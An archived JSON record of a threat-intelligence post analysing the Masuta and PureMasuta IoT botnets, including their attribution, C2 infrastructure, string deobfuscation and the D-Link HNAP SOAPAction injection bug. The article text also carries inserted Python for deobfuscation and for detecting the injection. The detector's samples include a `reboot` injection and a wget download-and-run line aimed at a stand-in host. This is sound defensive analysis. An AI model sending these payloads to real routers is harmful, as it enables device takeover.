{
	"id": "4e19a0ea-0663-4d11-baf5-619fee1d353d",
	"created_at": "2026-04-06T00:11:23.964238Z",
	"updated_at": "2026-04-10T13:12:52.906022Z",
	"deleted_at": null,
	"sha1_hash": "a306959ff3a6250c7b27945139ca00be6515770c",
	"title": "Masuta : Satori Creators’ Second Botnet Weaponizes A New Router Exploit. - New Sky Security",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1289353,
	"plain_text": "Masuta : Satori Creators’ Second Botnet Weaponizes A New\r\nRouter Exploit. - New Sky Security\r\nPublished: 2018-01-23 · Archived: 2026-04-02 10:45:24 UTC\r\nIntroduction\r\nSince the Mirai code leak, many botnets have appeared in the IoT threat landscape. While some of them are clearly Mirai carbon copies, others have added new attack methods, often taking the route of exploits to perform an attack. We analyzed two variants of an IoT botnet named “Masuta”, observed the involvement of a well-known IoT threat actor, and discovered a router exploit being weaponized for the first time in a botnet campaign.\r\nMasuta Code Leak \u0026 Attribution\r\nWe were able to get our hands on the source code of the Masuta (Japanese for “master”) botnet on an invite-only dark forum. After analyzing the configuration file, we saw that Masuta uses 0xdedeffba instead of Mirai’s 0xdeadbeef as the seed of the cipher key. Mirai-style obfuscation XORs every byte of a string with each of the four seed bytes in turn, which collapses to a single-byte XOR, so the strings in the configuration file were effectively XORed with ((0xDE ^ 0xDE) ^ 0xFF) ^ 0xBA = 0x45.\r\nXORing the configuration file with 0x45 yields the domain nexusiotsolutions(dot)net, a known C2 domain of Nexus Zeta, the actor behind the recent Satori attacks in which a Huawei router zero-day was used.\r\nhttps://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7\r\nPage 1 of 5\n\nThe WHOIS record for the domain also lists nexuszeta1337@gmail(.)com as the contact, indicating that Nexus Zeta is not a one-hit-wonder creator of Satori but has also been involved in creating the Masuta botnet.\r\nThe standard Masuta variant used several known/weak/default credentials to gain access to the IoT devices it attacked.\r\nMasuta attacks (identified by the recon indicator /bin/busybox MASUTA) have been on the rise since September: our honeypots observed 2400 IPs involved in the botnet in the last three months. 
The rising trend is shown in the graph below.\r\nOne of the prominent command and control servers involved in Masuta attacks is n(.)cf0(.)pw, or 93.174.93.63.\r\nPureMasuta Variant \u0026 Exploit Usage\r\nThis IP address, 93.174.93.63, gave us a way into another, evolved variant of the Masuta botnet. Although we did not obtain the source code of this variant from blackhat forums, analysis of the compiled ARM binary made it clear that this was not just a usual Masuta sample.\r\nThe variant (dubbed PureMasuta) contains the most typical Mirai-style code, including a weak credential list stored in obfuscated form (PMMV = “root”, TKXZT = “vizxv”, CFOKL = “admin”).\r\nThe credentials are hidden by a single-byte XOR with 0x22, as shown in the figure below; 0x22 is exactly the byte that Mirai’s own 0xdeadbeef seed collapses to, another inspiration from the Mirai leak.\r\nHowever, what makes PureMasuta stand out from common Mirai/Masuta samples is its use of the EDB 38722 D-Link exploit.\r\nExplaining the EDB 38722 D-Link HNAP Bug\r\nThe bug weaponized in PureMasuta lies in HNAP (Home Network Administration Protocol), which is itself built on SOAP. It is possible to craft a SOAP query that bypasses authentication by using the action hxxp://purenetworks.com/HNAP1/GetDeviceSettings. It is also possible to run system commands (leading to arbitrary code execution) because of improper string handling. Combining the two, one can form a SOAP request that first bypasses authentication and then causes arbitrary code execution. For example, the SOAPAction header below will cause a reboot:\r\nSOAPAction: “hxxp://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`”\r\nIn simple terms, whatever is written after GetDeviceSettings gets executed by the device.\r\nInstead of a reboot, the PureMasuta botnet downloads a shell script from a command and control server (via wget) and runs it. 
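The two obfuscation keys mentioned above (0x45 for Masuta’s configuration strings, 0x22 for PureMasuta’s credential list), worked through as an added example that is not code from the NewSky post or from the botnet itself: a Python re-implementation of the table-obfuscation routine in the leaked Mirai source (toggle_obf in table.c), which XORs every byte with the four bytes of the 32-bit seed in turn and therefore collapses to a single-byte XOR. The credential strings are the ones the post quotes from PureMasuta; the obfuscated form of the Masuta C2 domain is constructed here by running the same routine with the Masuta seed.

```python
# Added example, not the NewSky post's own code and not botnet source:
# Mirai-style table obfuscation as implemented in the leaked Mirai source
# (toggle_obf in table.c). Every byte of a string is XORed with the four
# bytes of a 32-bit seed in turn, which is the same as XORing once with
# k1 ^ k2 ^ k3 ^ k4. Masuta's 0xdedeffba collapses to 0x45 and Mirai's
# default 0xdeadbeef collapses to 0x22.

MIRAI_SEED = 0xDEADBEEF   # default seed in the leaked Mirai source
MASUTA_SEED = 0xDEDEFFBA  # seed the post reports for Masuta


def seed_bytes(seed: int) -> tuple:
    """Split a 32-bit seed into the k1..k4 bytes table.c works with."""
    return tuple((seed >> shift) & 0xFF for shift in (0, 8, 16, 24))


def effective_key(seed: int) -> int:
    """The single byte the four-step XOR collapses to."""
    k1, k2, k3, k4 = seed_bytes(seed)
    return k1 ^ k2 ^ k3 ^ k4


def toggle_obf(data: bytes, seed: int) -> bytes:
    """Step-for-step re-implementation of Mirai's toggle_obf(): XOR each
    byte with k1, then k2, then k3, then k4. Applying it twice restores
    the input, so the same call encodes and decodes."""
    k1, k2, k3, k4 = seed_bytes(seed)
    out = bytearray(data)
    for i, c in enumerate(out):
        c ^= k1
        c ^= k2
        c ^= k3
        c ^= k4
        out[i] = c
    return bytes(out)


def recover_config(entries, seed: int) -> list:
    """Decode a list of obfuscated table entries under the given seed."""
    return [toggle_obf(e, seed).decode('ascii', errors='replace') for e in entries]


# Obfuscated credential strings quoted in the post for PureMasuta; they
# decode under the Mirai seed, i.e. single-byte key 0x22.
PUREMASUTA_CREDS = [b'PMMV', b'TKXZT', b'CFOKL']

# Constructed sample: the Masuta C2 domain named in the post, obfuscated
# here with the Masuta seed so the decoder has something to recover.
MASUTA_C2_OBF = toggle_obf(b'nexusiotsolutions.net', MASUTA_SEED)


if __name__ == '__main__':
    for name, seed in (('Mirai', MIRAI_SEED), ('Masuta', MASUTA_SEED)):
        print(f'{name}: seed 0x{seed:08x} -> single-byte key 0x{effective_key(seed):02x}')
    print(recover_config(PUREMASUTA_CREDS, MIRAI_SEED))
    print(recover_config([MASUTA_C2_OBF], MASUTA_SEED))
```

Because the four-step XOR is equivalent to one byte, a 256-candidate brute force recovers the table of any Mirai descendant regardless of the advertised 32-bit seed; checking each candidate for printable output (or for a known credential such as root) is enough to pick the right one.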
The following image shows the script in action in the botnet binary.\r\nWe noticed that the command and control server (93.174.93.63) is the same one used by the original Masuta variants, indicating that PureMasuta is an evolved creation of the same Masuta threat actors.\r\nA proof of concept for the exploit is publicly available in places like exploit-db and pastebin, so we can assume it is not very difficult for an attacker to implement.\r\nObsession with Brian Krebs\r\nMany IoT botnets mention Brian Krebs, the journalist who was instrumental in the investigation behind Mirai, as an Easter egg. Masuta is no exception: we saw the following message in the source code:\r\nThis same message was tweeted by an unverified Twitter account of Nexus Zeta, connecting the dots on his association with the Masuta botnet.\r\nConclusion\r\nNexus Zeta is no stranger to implementing SOAP-related exploits. The threat actor has already been observed implementing two other known SOAP-related exploits, CVE-2014-8361 and CVE-2017-17215, in his Satori botnet project. A third SOAP exploit, the TR-069 bug, has also been observed previously in IoT botnets. This makes EDB 38722 the fourth SOAP-related exploit discovered in the wild in IoT botnets.\r\nProtocol exploits are more desirable for threat actors because they usually have a wider scope: a protocol can be implemented by various vendors and models, and a bug in the protocol itself carries over to a wider range of devices. 
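Detection for the SOAPAction abuse described in the EDB 38722 section above, as an added example that is not code from the NewSky post: a small Python scanner that parses raw HTTP requests, pulls the SOAPAction header, checks that it is a well-formed HNAP action URI (the post’s hxxp is a defanged http) and flags anything trailing the action name, escalating to an injection verdict when the trailing data contains shell metacharacters. The sample requests, including the reboot string quoted in the post and a wget dropper in the shape the post describes, are constructed for this example; the C2 hostname c2.example is a placeholder.

```python
# Added example, not from the NewSky post: detection logic for command
# injection through the HNAP SOAPAction header, the technique the post
# attributes to the EDB 38722 D-Link bug. A legitimate HNAP action is the
# URI http://purenetworks.com/HNAP1/<ActionName>; the post's point is that
# whatever follows the action name is handed to a shell, so the detector
# flags any SOAPAction carrying extra data after a well-formed action name
# and escalates when that data contains shell metacharacters.
import re

HNAP_ACTION_RE = re.compile(r'^https?://purenetworks\.com/HNAP1/([A-Za-z0-9_]+)(.*)$')
SHELL_META = set('`$;|&<>(){}')  # should never appear after an action name


def parse_headers(raw: str) -> dict:
    """Parse the header block of a raw HTTP request into a dict keyed by
    lowercased header name. SOAPAction values are normally wrapped in
    double quotes; those are stripped so the URI can be matched directly."""
    head = raw.split('\r\n\r\n', 1)[0]
    headers = {}
    for line in head.split('\r\n')[1:]:
        if ':' not in line:
            continue
        name, value = line.split(':', 1)
        headers[name.strip().lower()] = value.strip().strip('"')
    return headers


def classify_soapaction(value: str) -> tuple:
    """Return (verdict, action, tail); verdict is 'benign', 'suspicious'
    (trailing data after the action) or 'injection' (shell metacharacters)."""
    m = HNAP_ACTION_RE.match(value)
    if m is None:
        # Not an HNAP action URI at all; worth a look, but not this bug.
        return ('suspicious', None, value)
    action, tail = m.group(1), m.group(2)
    if tail == '':
        return ('benign', action, '')
    if any(ch in SHELL_META for ch in tail):
        return ('injection', action, tail)
    return ('suspicious', action, tail)


def scan_request(raw: str) -> tuple:
    """Classify one raw request; ('no-soapaction', None, '') if the header is absent."""
    value = parse_headers(raw).get('soapaction')
    if value is None:
        return ('no-soapaction', None, '')
    return classify_soapaction(value)


def _request(soapaction: str) -> str:
    """Build a constructed HNAP POST carrying the given SOAPAction value."""
    return ('POST /HNAP1/ HTTP/1.1\r\n'
            'Host: 192.168.0.1\r\n'
            'Content-Type: text/xml; charset=utf-8\r\n'
            'SOAPAction: "' + soapaction + '"\r\n'
            '\r\n'
            '<?xml version="1.0" encoding="utf-8"?><soap:Envelope/>')


# Constructed samples: a normal GetDeviceSettings call, the reboot string
# quoted in the post, a wget dropper shaped like the one the post describes
# (c2.example is a placeholder), and a request with no SOAPAction at all.
SAMPLES = {
    'normal': _request('http://purenetworks.com/HNAP1/GetDeviceSettings'),
    'reboot': _request('http://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`'),
    'dropper': _request('http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp;wget http://c2.example/bin.sh;sh bin.sh`'),
    'no_soap': 'GET / HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n',
}


def scan_all(samples: dict) -> dict:
    """Verdict per sample name."""
    return {name: scan_request(raw)[0] for name, raw in samples.items()}


if __name__ == '__main__':
    for name, verdict in scan_all(SAMPLES).items():
        print(f'{name:8s} {verdict}')
```

Keying the rule on any trailing segment after a known action name, rather than on the backtick in the published payload, catches the class of injection the post describes (whatever follows GetDeviceSettings is executed) instead of one string, and the regex covers the other HNAP actions without enumerating them.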
NewSky Security IoT Halo detects all four SOAP exploits mentioned in this blog.\r\nAnkit Anubhav, Principal Researcher, NewSky Security\r\nSource: https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7"
	],
	"report_names": [
		"masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c90b1108-7555-4e64-9bfe-1ef6bf2caf18",
			"created_at": "2023-01-06T13:46:38.739456Z",
			"updated_at": "2026-04-10T02:00:03.084254Z",
			"deleted_at": null,
			"main_name": "Nexus Zeta",
			"aliases": [],
			"source_name": "MISPGALAXY:Nexus Zeta",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434283,
	"ts_updated_at": 1775826772,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a306959ff3a6250c7b27945139ca00be6515770c.pdf",
		"text": "https://archive.orkl.eu/a306959ff3a6250c7b27945139ca00be6515770c.txt",
		"img": "https://archive.orkl.eu/a306959ff3a6250c7b27945139ca00be6515770c.jpg"
	}
}